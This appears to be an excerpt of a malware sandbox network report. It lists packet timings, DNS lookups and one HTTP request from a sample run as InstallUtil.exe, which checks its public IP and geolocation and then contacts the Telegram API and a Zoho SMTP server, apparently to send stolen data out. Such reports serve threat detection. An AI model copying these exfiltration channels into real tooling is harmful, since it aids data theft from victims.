Sep 12, 2024 21:07:55.820188999 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.481796980 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.481906891 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:56.484251022 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:56.484261036 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.484654903 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.486567020 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:56.531416893 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.721242905 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.721323967 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:56.721426010 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:56.728926897 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:00.376660109 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:00.382203102 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:00.382288933 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:00.382503986 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:00.387928963 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:01.076000929 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:01.080951929 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:01.085865021 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:01.292069912 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:01.333259106 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:01.367881060 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.367927074 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:01.367985010 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.372123003 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.372133017 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:01.862082005 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:01.862209082 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.863935947 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.863946915 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:01.864326000 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:01.911396027 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:01.964184046 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.007411957 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.081341982 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.081485987 CEST	443	49736	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.081712008 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.085644960 CEST	49736	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.089374065 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.094202995 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:02.171431065 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:02.176342964 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:02.176419020 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:02.300815105 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:02.303203106 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.303256989 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.303316116 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.303658009 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.303678036 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.348949909 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.757431030 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:02.757709026 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:02.762620926 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:02.762945890 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.764866114 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.764893055 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.924444914 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.924536943 CEST	443	49738	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:02.924592018 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.925245047 CEST	49738	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:02.929152012 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.930454969 CEST	49739	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.934668064 CEST	80	49735	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:02.934757948 CEST	49735	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.935452938 CEST	80	49739	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:02.935637951 CEST	49739	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.935637951 CEST	49739	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:02.940506935 CEST	80	49739	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:03.610282898 CEST	80	49739	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:03.611679077 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:03.611740112 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:03.611814976 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:03.612112999 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:03.612128019 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:03.617580891 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.617916107 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:03.623120070 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.661461115 CEST	49739	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:03.805299997 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.805879116 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:03.810758114 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.993984938 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.994031906 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.994067907 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:03.994087934 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:03.997519016 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:04.003496885 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.075417042 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.078829050 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.078917980 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.185841084 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.189292908 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:04.194168091 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.230704069 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.230928898 CEST	443	49740	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.231018066 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.231502056 CEST	49740	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.236438990 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:04.241339922 CEST	80	49741	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:04.241456985 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:04.241550922 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:04.246463060 CEST	80	49741	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:04.376504898 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.378056049 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:04.391868114 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.575885057 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.576353073 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:04.581299067 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.836584091 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.836894989 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:04.841939926 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:04.930140972 CEST	80	49741	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:04.931674957 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.931782007 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.931885004 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.942630053 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:04.942693949 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:04.973961115 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.023979902 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.024422884 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.031105042 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.213339090 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.213650942 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.218450069 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.400533915 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.401330948 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.401424885 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.401452065 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.401473999 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:05.406476021 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.406497955 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.406605959 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.406620979 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.406634092 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.417586088 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:05.419576883 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:05.419658899 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:05.574525118 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:05.574620008 CEST	443	49742	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:05.574812889 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:05.575356007 CEST	49742	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:05.579721928 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.580425024 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.586618900 CEST	80	49741	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:05.586642981 CEST	80	49743	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:05.586724997 CEST	49741	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.586766005 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.586869955 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:05.592535973 CEST	80	49743	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:05.748999119 CEST	587	49737	185.230.214.164	192.168.2.9
Sep 12, 2024 21:08:05.802148104 CEST	49737	587	192.168.2.9	185.230.214.164
Sep 12, 2024 21:08:06.255065918 CEST	80	49743	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:06.256714106 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.256761074 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.256820917 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.257169962 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.257183075 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.302057981 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.719432116 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.721435070 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.721476078 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.867099047 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.867331982 CEST	443	49744	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:06.867438078 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.867932081 CEST	49744	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:06.871741056 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.872924089 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.877031088 CEST	80	49743	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:06.877264023 CEST	49743	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.877768993 CEST	80	49745	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:06.877851009 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.877965927 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:06.882764101 CEST	80	49745	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:07.542783976 CEST	80	49745	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:07.544194937 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:07.544289112 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:07.544404030 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:07.544667959 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:07.544706106 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:07.583367109 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.002764940 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.004817009 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.004851103 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.135132074 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.135225058 CEST	443	49746	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.135282993 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.135822058 CEST	49746	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.139689922 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.141084909 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.144901991 CEST	80	49745	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:08.144992113 CEST	49745	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.146078110 CEST	80	49747	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:08.146143913 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.146230936 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:08.150976896 CEST	80	49747	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:08.833596945 CEST	80	49747	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:08.834965944 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.835020065 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.835118055 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.835378885 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:08.835400105 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:08.880235910 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.313071966 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:09.314760923 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:09.314795017 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:09.474508047 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:09.474807024 CEST	443	49748	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:09.474898100 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:09.475322962 CEST	49748	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:09.479963064 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.480741978 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.486471891 CEST	80	49749	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:09.486526966 CEST	80	49747	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:09.486597061 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.486619949 CEST	49747	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.486908913 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:09.492538929 CEST	80	49749	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:10.153218031 CEST	80	49749	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:10.155694008 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.155751944 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.155881882 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.156624079 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.156634092 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.208291054 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.624392986 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.630810976 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.630851030 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.756875992 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.756983995 CEST	443	49750	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:10.757333994 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.757877111 CEST	49750	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:10.761429071 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.762762070 CEST	49751	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.766753912 CEST	80	49749	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:10.766848087 CEST	49749	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.767602921 CEST	80	49751	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:10.767683983 CEST	49751	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.767851114 CEST	49751	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:10.772713900 CEST	80	49751	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:11.461127996 CEST	80	49751	132.226.247.73	192.168.2.9
Sep 12, 2024 21:08:11.505160093 CEST	49751	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:08:12.633485079 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:12.633563042 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:12.633637905 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:12.633944988 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:12.633955956 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:13.110028982 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:13.112036943 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:13.112073898 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:13.333900928 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:13.334147930 CEST	443	49752	188.114.97.3	192.168.2.9
Sep 12, 2024 21:08:13.335549116 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:13.335854053 CEST	49752	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:08:13.342206001 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:13.342247009 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:13.342499971 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:13.342897892 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:13.342912912 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:13.959059000 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:13.959167957 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:13.960613012 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:13.960624933 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:13.960912943 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:13.962337971 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:14.007402897 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:14.209557056 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:14.209644079 CEST	443	49753	149.154.167.220	192.168.2.9
Sep 12, 2024 21:08:14.209867954 CEST	49753	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:08:14.220623016 CEST	49753	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 12, 2024 21:07:42.170541048 CEST	51010	53	192.168.2.9	1.1.1.1
Sep 12, 2024 21:07:42.179641962 CEST	53	51010	1.1.1.1	192.168.2.9
Sep 12, 2024 21:07:43.144161940 CEST	55415	53	192.168.2.9	1.1.1.1
Sep 12, 2024 21:07:43.152113914 CEST	53	55415	1.1.1.1	192.168.2.9
Sep 12, 2024 21:07:49.950795889 CEST	51392	53	192.168.2.9	1.1.1.1
Sep 12, 2024 21:07:49.958574057 CEST	53	51392	1.1.1.1	192.168.2.9
Sep 12, 2024 21:07:55.809372902 CEST	57209	53	192.168.2.9	1.1.1.1
Sep 12, 2024 21:07:55.818939924 CEST	53	57209	1.1.1.1	192.168.2.9
Sep 12, 2024 21:08:02.162870884 CEST	58920	53	192.168.2.9	1.1.1.1
Sep 12, 2024 21:08:02.170744896 CEST	53	58920	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 12, 2024 21:07:42.170541048 CEST	192.168.2.9	1.1.1.1	0x1ee6	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:43.144161940 CEST	192.168.2.9	1.1.1.1	0x80b4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:49.950795889 CEST	192.168.2.9	1.1.1.1	0xcde8	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:55.809372902 CEST	192.168.2.9	1.1.1.1	0xb4ad	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:08:02.162870884 CEST	192.168.2.9	1.1.1.1	0x4420	Standard query (0)	smtp.zoho.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:42.179641962 CEST	1.1.1.1	192.168.2.9	0x1ee6	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:43.152113914 CEST	1.1.1.1	192.168.2.9	0x80b4	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:43.152113914 CEST	1.1.1.1	192.168.2.9	0x80b4	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:49.958574057 CEST	1.1.1.1	192.168.2.9	0xcde8	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:49.958574057 CEST	1.1.1.1	192.168.2.9	0xcde8	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:07:55.818939924 CEST	1.1.1.1	192.168.2.9	0xb4ad	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 12, 2024 21:08:02.170744896 CEST	1.1.1.1	192.168.2.9	0x4420	No error (0)	smtp.zoho.eu		185.230.214.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49717	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:42.226953983 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:42.893147945 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 59c88092adc8e0d90c70f73d89b3b5ca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
